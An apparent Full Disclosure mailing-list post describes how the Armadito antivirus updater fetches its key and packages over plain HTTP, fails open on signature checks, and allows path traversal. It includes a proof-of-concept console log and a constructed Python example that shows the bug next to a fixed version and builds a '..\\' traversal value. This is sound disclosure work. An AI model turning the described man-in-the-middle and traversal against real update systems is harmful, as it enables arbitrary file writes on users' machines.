Full Disclosure mailing list archives
Armadito remote arbitrary file write in case of MiTM
From: <thedeadcow () tutanota com>
Date: Mon, 27 Jun 2016 18:33:15 +0100 (BST)
Armadito (https://github.com/armadito) is a cross-platform open-source antivirus that originated as the DAVFI project, financed through a French government program. For a security product that is supposed to protect computers against malware, its update system fails at multiple points:

* the public key used to check update packages is retrieved over plain HTTP. The same goes for the packages themselves.
* if Armadito can't download this public key, a bug makes it consider any file it checks as valid (you don't even need to forge a signature).
* a vulnerability as old as General de Gaulle (path traversal) then allows a URL under the attacker's control to be downloaded to an arbitrary path.

All this allows someone in control of DNS answers, or more generally in a MiTM position, to write arbitrary files when the update process is performed. It also allows the vendor to do it if they want (but db.armadito.org does not seem to work at the time of writing this email). A simple Python HTTP server is attached to this mail as a proof of concept.

This happens in the ArmaditoSvc tool when run with the "--updatedb" flag. The documentation doesn't specify whether this should run as an administrator or not.

Here is an example of the output of this tool when a potential MiTM is performed:

===========
C:\tmp\armadito>type ..\cow.txt
File specified not found.

C:\tmp\armadito>ArmaditoSvc.exe --updatedb
---------------------------------
----- Armadito Scan service -----
---------------------------------
[+] Debug :: UpdateModulesDB :: description file downloaded successfully!
[+] Debug :: UpdateModulesDB :: signature file downloaded successfully!
armadito[4624]: <error> [-] Error :: download_pub_key :: URLDownloadToCacheFileA failed :: error = 0x800c0006
armadito[4624]: <error> [-] Error :: verify_file_signature :: Can't download public key from armadito server!
armadito[4624]: <error> [-] Error :: verify_file_signature :: Crypt Destroy Key failed! :: GLE = 0x57
[+] Debug :: UpdateModulesDB :: File Signature verified successfully !
[-] Error :: GetFileContent :: Opening the file failed! :: error = 3
[+] Debug :: DownloadPackageFiles :: Downloading file from :: http://127.0.0.1/cow....
[+] Debug :: DownloadPackageFiles :: cache filename = XX\AppData\Local\Microsoft\Windows\INetCache\IE\3YTFPC0U\cow[1].htm
[+] Debug :: ConvertBytesToChar :: string = 4dc9a4320e79db56894c037f27d5dc0a
[+] Debug :: DownloadPackageFiles :: checksum = 4dc9a4320e79db56894c037f27d5dc0a
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first
[+] Debug :: UpdateModulesDB :: Armadito service suspended successfully!
[+] Debug :: get_db_module_path :: completePath = C:\tmp\armadito\modules\DB\..\..\..\..\..\..\..\..\..\..\..\tmp\cow.txt
Conf_file = C:\tmp\armadito\conf\armadito.conf
[+] Debug :: init_configuration :: conf file = C:\tmp\armadito\conf\armadito.conf
armadito[4624]: <warning> cannot open conf file C:\tmp\armadito\conf\armadito.conf
[+] Debug :: Configuration loaded successfully!
[+] Debug :: Armadito structure loaded successfully!
armadito[4624]: <error> [-] Error :: FilterConnectCommunicationPort() failed :: errcode = 0x80070002
armadito[4624]: <error> Scan Thread initialization failed!
armadito[4624]: <error> Service loaded with errors during pause.
[+] Debug :: UpdateModulesDB :: Armadito service resumed successfully!
armadito[4624]: <error> [-] Error :: SaveHashInCacheFile :: Creating the cache file failed! :: error = 3
[+] Debug :: UpdateModulesDB :: Modules Database updated successfully!
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first

C:\tmp\armadito>type ..\cow.txt
put_your_dead_cow_here
==============

This is an irresponsible disclosure due to irresponsible spending of the French people's money.

The Dead Cow.
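The two defects the post describes, a signature check that reports success when the public key cannot be downloaded and a destination path that walks out of the module directory, written out as an added Python example with the corrected behaviour beside the buggy one. This is not code from Armadito or from the advisory's author: the HMAC standing in for the real public-key signature, the pinned key, the one-destination-per-line description layout and every function name below are assumptions made so the example runs offline.

```python
"""Added example, not Armadito code: fail-closed signature checking and a
path-containment check for an update pipeline. The signature scheme
(HMAC-SHA256 as a stand-in for a public-key signature), the pinned key and
the description-file format (one destination path per line) are constructed."""
import hashlib
import hmac
import ntpath

# Constructed sample: key material pinned into the binary at build time, so
# the updater never fetches the verification key over plain HTTP and never
# reaches a "can't download public key" branch at all.
PINNED_KEY = b"constructed-pinned-key-material"
# Module DB directory as it appears in the post's log.
DB_ROOT = r"C:\tmp\armadito\modules\DB"


def sign(data: bytes, key: bytes) -> str:
    """Stand-in signer (symmetric HMAC) so the example is self-contained."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_fail_open(data: bytes, sig: str, key):
    """Models the bug the post describes: the result starts out as
    'verified' and the key-download failure path only logs, so the
    caller sees success without any signature being checked."""
    verified = True                       # initialised to success...
    if key is None:
        print("Error :: verify_file_signature :: Can't download public key!")
        # ...and not cleared on this error path.
    else:
        verified = hmac.compare_digest(sign(data, key), sig)
    return verified


def verify_fail_closed(data: bytes, sig: str, key) -> bool:
    """Corrected version: no key, or a bad signature, means no update."""
    if key is None:
        return False
    return hmac.compare_digest(sign(data, key), sig)


def resolve_module_path(db_root: str, relative: str) -> str:
    """Join a description entry onto the DB directory and refuse any result
    that lands outside it. ntpath is used so Windows-style paths resolve
    the same way on any host (including an absolute path in the entry)."""
    root = ntpath.normpath(db_root)
    target = ntpath.normpath(ntpath.join(root, relative))
    inside = ntpath.normcase(target).startswith(ntpath.normcase(root) + ntpath.sep)
    if not inside:
        raise ValueError(f"path escapes module DB directory: {relative!r}")
    return target


def plan_update(description: bytes, sig: str, key, db_root: str = DB_ROOT):
    """Fail-closed pipeline: authenticate the description first, then
    resolve every destination inside db_root. Returns the resolved paths;
    raises on a missing key, a bad signature or a traversal attempt."""
    if not verify_fail_closed(description, sig, key):
        raise PermissionError("update rejected: description not verified")
    entries = [ln.strip() for ln in description.decode().splitlines() if ln.strip()]
    return [resolve_module_path(db_root, e) for e in entries]


if __name__ == "__main__":
    # Constructed description files: one legitimate entry, and one carrying
    # the same "..\" traversal shape as completePath in the post's log.
    traversal = "..\\" * 11 + r"tmp\cow.txt"
    good = b"main.db\n"
    bad = good + traversal.encode() + b"\n"
    print(verify_fail_open(bad, "forged", None))     # True: the bug
    print(verify_fail_closed(bad, "forged", None))   # False
    print(plan_update(good, sign(good, PINNED_KEY), PINNED_KEY))
    try:
        plan_update(bad, sign(bad, PINNED_KEY), PINNED_KEY)
    except ValueError as err:
        print("blocked:", err)
```

The containment check runs after authentication rather than instead of it: even a correctly signed description should not be able to name a destination outside the module directory, which is the layering the log above shows missing (signature "verified" with no key, then a `..\` chain resolved verbatim).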
Attachment: serv.py
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Armadito remote arbitrary file write in case of MiTM thedeadcow (Jun 27)